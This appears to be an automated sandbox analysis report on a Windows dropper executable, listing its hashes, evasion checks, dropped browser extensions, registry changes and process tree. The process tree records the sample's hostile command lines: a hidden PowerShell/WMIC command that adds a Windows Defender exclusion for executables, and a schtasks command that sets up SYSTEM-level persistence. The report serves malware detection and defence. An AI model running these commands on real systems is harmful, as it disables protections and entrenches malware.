Analysis
-
max time kernel
150s -
max time network
298s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
15/07/2024, 05:04
Static task
static1
Behavioral task
behavioral1
Sample
5f1a78b97f399e65d63539c48a09209f41481e2460c3a1d4907511216826aa24.exe
Resource
win7-20240705-en
General
-
Target
5f1a78b97f399e65d63539c48a09209f41481e2460c3a1d4907511216826aa24.exe
-
Size
7.3MB
-
MD5
a612e510c14aa87f459070528b649812
-
SHA1
4ed115b4961b2db81cf5832706b22db0525efec4
-
SHA256
5f1a78b97f399e65d63539c48a09209f41481e2460c3a1d4907511216826aa24
-
SHA512
8ad41327f96f0c0ef14fc5566b89c63a6307a32e8656a4178ab6e4f0e02bb292ef98945616a2cc7b834a0c445d5883f417e665845d35d52c9b99b83e1c352554
-
SSDEEP
196608:91ODLjOzHmvKe7vfBjFcje383/DG8yUZ4JVbPaMbPoT4c0QL6n:3ODLjAHUjfXqembt4JVbiwa4crLw
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 35 3200 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 4048 powershell.exe 4428 powershell.EXE 3200 powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Control Panel\International\Geo\Nation DsRWDpX.exe -
Executes dropped EXE 4 IoCs
pid Process 596 Install.exe 1332 Install.exe 4000 Install.exe 2772 DsRWDpX.exe -
Loads dropped DLL 1 IoCs
pid Process 3200 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json DsRWDpX.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json DsRWDpX.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini Install.exe -
Drops file in System32 directory 33 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content DsRWDpX.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol DsRWDpX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft DsRWDpX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData DsRWDpX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 DsRWDpX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 DsRWDpX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 DsRWDpX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_A71D3C9ACFD0888B19B4EAA86FAA4437 DsRWDpX.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat DsRWDpX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 DsRWDpX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04 DsRWDpX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_32201FF65E9A20A693462A3946A29CAE DsRWDpX.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 DsRWDpX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 DsRWDpX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_DE59F8C40B88A0DF57DC57DBBEDD7057 DsRWDpX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies DsRWDpX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA DsRWDpX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_32201FF65E9A20A693462A3946A29CAE DsRWDpX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE DsRWDpX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache DsRWDpX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 DsRWDpX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 DsRWDpX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04 DsRWDpX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA DsRWDpX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_DE59F8C40B88A0DF57DC57DBBEDD7057 DsRWDpX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_A71D3C9ACFD0888B19B4EAA86FAA4437 DsRWDpX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat rundll32.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files (x86)\esZXvMCNuGEfqJuxklR\QBGxwHw.xml DsRWDpX.exe File created C:\Program Files (x86)\EUXfJBljbcUn\rNonGUa.dll DsRWDpX.exe File created C:\Program Files (x86)\MaCEdJmjU\qNkQJd.dll DsRWDpX.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi DsRWDpX.exe File created C:\Program Files (x86)\MaCEdJmjU\ArJOBdp.xml DsRWDpX.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi DsRWDpX.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja DsRWDpX.exe File created C:\Program Files (x86)\zWTlFEDWyZjU2\mqYNzkwQQJjdO.dll DsRWDpX.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak DsRWDpX.exe File created C:\Program Files (x86)\zWTlFEDWyZjU2\uibKerK.xml DsRWDpX.exe File created C:\Program Files (x86)\esZXvMCNuGEfqJuxklR\gwOIUhD.dll DsRWDpX.exe File created C:\Program Files (x86)\CYZcjjLrQSSSC\roQpdoe.dll DsRWDpX.exe File created C:\Program Files (x86)\CYZcjjLrQSSSC\DgPWowJ.xml DsRWDpX.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak DsRWDpX.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\rrUPsTjgSYBWMUseO.job schtasks.exe File created C:\Windows\Tasks\bbMwfSaEkvrmTtNtmp.job schtasks.exe File created C:\Windows\Tasks\LTdmnWMddFrWELagp.job schtasks.exe File created C:\Windows\Tasks\dZgNXlBFHKJPYkR.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 2320 4000 WerFault.exe 83 4100 1332 WerFault.exe 73 5108 2772 WerFault.exe 153 -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "0" Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{38fd360b-0000-0000-0000-d01200000000} DsRWDpX.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket DsRWDpX.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" DsRWDpX.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{38fd360b-0000-0000-0000-d01200000000} Install.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{38fd360b-0000-0000-0000-d01200000000}\MaxCapacity = "14116" Install.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3728 schtasks.exe 2912 schtasks.exe 4248 schtasks.exe 1072 schtasks.exe 1548 schtasks.exe 1308 schtasks.exe 824 schtasks.exe 1512 schtasks.exe 4340 schtasks.exe 2732 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 49 IoCs
pid Process 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 1168 powershell.exe 1168 powershell.exe 1168 powershell.exe 2972 powershell.exe 2972 powershell.exe 2972 powershell.exe 4428 powershell.EXE 4428 powershell.EXE 4428 powershell.EXE 2772 DsRWDpX.exe 2772 DsRWDpX.exe 2772 DsRWDpX.exe 2772 DsRWDpX.exe 2772 DsRWDpX.exe 2772 DsRWDpX.exe 2772 DsRWDpX.exe 2772 DsRWDpX.exe 2772 DsRWDpX.exe 2772 DsRWDpX.exe 2772 DsRWDpX.exe 2772 DsRWDpX.exe 2772 DsRWDpX.exe 2772 DsRWDpX.exe 2772 DsRWDpX.exe 2772 DsRWDpX.exe 3200 powershell.exe 3200 powershell.exe 3200 powershell.exe 2772 DsRWDpX.exe 2772 DsRWDpX.exe 2772 DsRWDpX.exe 2772 DsRWDpX.exe 2772 DsRWDpX.exe 2772 DsRWDpX.exe 2772 DsRWDpX.exe 2772 DsRWDpX.exe 2772 DsRWDpX.exe 2772 DsRWDpX.exe 2772 DsRWDpX.exe 2772 DsRWDpX.exe 2772 DsRWDpX.exe 2772 DsRWDpX.exe 2772 DsRWDpX.exe 2772 DsRWDpX.exe 2772 DsRWDpX.exe 2772 DsRWDpX.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4048 powershell.exe Token: SeIncreaseQuotaPrivilege 4988 WMIC.exe Token: SeSecurityPrivilege 4988 WMIC.exe Token: SeTakeOwnershipPrivilege 4988 WMIC.exe Token: SeLoadDriverPrivilege 4988 WMIC.exe Token: SeSystemProfilePrivilege 4988 WMIC.exe Token: SeSystemtimePrivilege 4988 WMIC.exe Token: SeProfSingleProcessPrivilege 4988 WMIC.exe Token: SeIncBasePriorityPrivilege 4988 WMIC.exe Token: SeCreatePagefilePrivilege 4988 WMIC.exe Token: SeBackupPrivilege 4988 WMIC.exe Token: SeRestorePrivilege 4988 WMIC.exe Token: SeShutdownPrivilege 4988 WMIC.exe Token: SeDebugPrivilege 4988 WMIC.exe Token: SeSystemEnvironmentPrivilege 4988 WMIC.exe Token: SeRemoteShutdownPrivilege 4988 WMIC.exe Token: SeUndockPrivilege 4988 WMIC.exe Token: SeManageVolumePrivilege 4988 WMIC.exe Token: 33 4988 WMIC.exe Token: 34 4988 WMIC.exe Token: 35 4988 WMIC.exe Token: 36 4988 WMIC.exe Token: SeIncreaseQuotaPrivilege 4988 WMIC.exe Token: SeSecurityPrivilege 4988 WMIC.exe Token: SeTakeOwnershipPrivilege 4988 WMIC.exe Token: SeLoadDriverPrivilege 4988 WMIC.exe Token: SeSystemProfilePrivilege 4988 WMIC.exe Token: SeSystemtimePrivilege 4988 WMIC.exe Token: SeProfSingleProcessPrivilege 4988 WMIC.exe Token: SeIncBasePriorityPrivilege 4988 WMIC.exe Token: SeCreatePagefilePrivilege 4988 WMIC.exe Token: SeBackupPrivilege 4988 WMIC.exe Token: SeRestorePrivilege 4988 WMIC.exe Token: SeShutdownPrivilege 4988 WMIC.exe Token: SeDebugPrivilege 4988 WMIC.exe Token: SeSystemEnvironmentPrivilege 4988 WMIC.exe Token: SeRemoteShutdownPrivilege 4988 WMIC.exe Token: SeUndockPrivilege 4988 WMIC.exe Token: SeManageVolumePrivilege 4988 WMIC.exe Token: 33 4988 WMIC.exe Token: 34 4988 WMIC.exe Token: 35 4988 WMIC.exe Token: 36 4988 WMIC.exe Token: SeDebugPrivilege 1168 powershell.exe Token: SeDebugPrivilege 2972 powershell.exe Token: SeDebugPrivilege 4428 powershell.EXE Token: SeDebugPrivilege 3200 powershell.exe Token: SeAssignPrimaryTokenPrivilege 4876 WMIC.exe Token: SeIncreaseQuotaPrivilege 4876 WMIC.exe Token: SeSecurityPrivilege 4876 WMIC.exe Token: SeTakeOwnershipPrivilege 4876 WMIC.exe Token: SeLoadDriverPrivilege 4876 WMIC.exe Token: SeSystemtimePrivilege 4876 WMIC.exe Token: SeBackupPrivilege 4876 WMIC.exe Token: SeRestorePrivilege 4876 WMIC.exe Token: SeShutdownPrivilege 4876 WMIC.exe Token: SeSystemEnvironmentPrivilege 4876 WMIC.exe Token: SeUndockPrivilege 4876 WMIC.exe Token: SeManageVolumePrivilege 4876 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 4876 WMIC.exe Token: SeIncreaseQuotaPrivilege 4876 WMIC.exe Token: SeSecurityPrivilege 4876 WMIC.exe Token: SeTakeOwnershipPrivilege 4876 WMIC.exe Token: SeLoadDriverPrivilege 4876 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4740 wrote to memory of 596 4740 5f1a78b97f399e65d63539c48a09209f41481e2460c3a1d4907511216826aa24.exe 72 PID 4740 wrote to memory of 596 4740 5f1a78b97f399e65d63539c48a09209f41481e2460c3a1d4907511216826aa24.exe 72 PID 4740 wrote to memory of 596 4740 5f1a78b97f399e65d63539c48a09209f41481e2460c3a1d4907511216826aa24.exe 72 PID 596 wrote to memory of 1332 596 Install.exe 73 PID 596 wrote to memory of 1332 596 Install.exe 73 PID 596 wrote to memory of 1332 596 Install.exe 73 PID 1332 wrote to memory of 1396 1332 Install.exe 75 PID 1332 wrote to memory of 1396 1332 Install.exe 75 PID 1332 wrote to memory of 1396 1332 Install.exe 75 PID 1396 wrote to memory of 3192 1396 forfiles.exe 77 PID 1396 wrote to memory of 3192 1396 forfiles.exe 77 PID 1396 wrote to memory of 3192 1396 forfiles.exe 77 PID 3192 wrote to memory of 4048 3192 cmd.exe 78 PID 3192 wrote to memory of 4048 3192 cmd.exe 78 PID 3192 wrote to memory of 4048 3192 cmd.exe 78 PID 4048 wrote to memory of 4988 4048 powershell.exe 79 PID 4048 wrote to memory of 4988 4048 powershell.exe 79 PID 4048 wrote to memory of 4988 4048 powershell.exe 79 PID 1332 wrote to memory of 1072 1332 Install.exe 81 PID 1332 wrote to memory of 1072 1332 Install.exe 81 PID 1332 wrote to memory of 1072 1332 Install.exe 81 PID 4000 wrote to memory of 1168 4000 Install.exe 84 PID 4000 wrote to memory of 1168 4000 Install.exe 84 PID 4000 wrote to memory of 1168 4000 Install.exe 84 PID 1168 wrote to memory of 2564 1168 powershell.exe 86 PID 1168 wrote to memory of 2564 1168 powershell.exe 86 PID 1168 wrote to memory of 2564 1168 powershell.exe 86 PID 2564 wrote to memory of 3456 2564 cmd.exe 87 PID 2564 wrote to memory of 3456 2564 cmd.exe 87 PID 2564 wrote to memory of 3456 2564 cmd.exe 87 PID 1168 wrote to memory of 4956 1168 powershell.exe 88 PID 1168 wrote to memory of 4956 1168 powershell.exe 88 PID 1168 wrote to memory of 4956 1168 powershell.exe 88 PID 1168 wrote to memory of 1176 1168 powershell.exe 89 PID 1168 wrote to memory of 1176 1168 powershell.exe 89 PID 1168 wrote to memory of 1176 1168 powershell.exe 89 PID 1168 wrote to memory of 4460 1168 powershell.exe 90 PID 1168 wrote to memory of 4460 1168 powershell.exe 90 PID 1168 wrote to memory of 4460 1168 powershell.exe 90 PID 1168 wrote to memory of 2844 1168 powershell.exe 91 PID 1168 wrote to memory of 2844 1168 powershell.exe 91 PID 1168 wrote to memory of 2844 1168 powershell.exe 91 PID 1168 wrote to memory of 4184 1168 powershell.exe 92 PID 1168 wrote to memory of 4184 1168 powershell.exe 92 PID 1168 wrote to memory of 4184 1168 powershell.exe 92 PID 1168 wrote to memory of 4336 1168 powershell.exe 93 PID 1168 wrote to memory of 4336 1168 powershell.exe 93 PID 1168 wrote to memory of 4336 1168 powershell.exe 93 PID 1168 wrote to memory of 3480 1168 powershell.exe 94 PID 1168 wrote to memory of 3480 1168 powershell.exe 94 PID 1168 wrote to memory of 3480 1168 powershell.exe 94 PID 1168 wrote to memory of 2820 1168 powershell.exe 95 PID 1168 wrote to memory of 2820 1168 powershell.exe 95 PID 1168 wrote to memory of 2820 1168 powershell.exe 95 PID 1168 wrote to memory of 2980 1168 powershell.exe 96 PID 1168 wrote to memory of 2980 1168 powershell.exe 96 PID 1168 wrote to memory of 2980 1168 powershell.exe 96 PID 1168 wrote to memory of 3328 1168 powershell.exe 97 PID 1168 wrote to memory of 3328 1168 powershell.exe 97 PID 1168 wrote to memory of 3328 1168 powershell.exe 97 PID 1168 wrote to memory of 1156 1168 powershell.exe 98 PID 1168 wrote to memory of 1156 1168 powershell.exe 98 PID 1168 wrote to memory of 1156 1168 powershell.exe 98 PID 1168 wrote to memory of 4688 1168 powershell.exe 99
Processes
-
C:\Users\Admin\AppData\Local\Temp\5f1a78b97f399e65d63539c48a09209f41481e2460c3a1d4907511216826aa24.exe"C:\Users\Admin\AppData\Local\Temp\5f1a78b97f399e65d63539c48a09209f41481e2460c3a1d4907511216826aa24.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4740 -
C:\Users\Admin\AppData\Local\Temp\7zS607F.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:596 -
C:\Users\Admin\AppData\Local\Temp\7zS6244.tmp\Install.exe.\Install.exe /AGNdidMtni "525403" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1332 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m ping.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"4⤵
- Suspicious use of WriteProcessMemory
PID:1396 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
- Suspicious use of WriteProcessMemory
PID:3192 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4048 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:4988
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bbMwfSaEkvrmTtNtmp" /SC once /ST 05:05:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS6244.tmp\Install.exe\" cK /NaCqdidskY 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:1072
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1332 -s 10284⤵
- Program crash
PID:4100
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS6244.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zS6244.tmp\Install.exe cK /NaCqdidskY 525403 /S1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
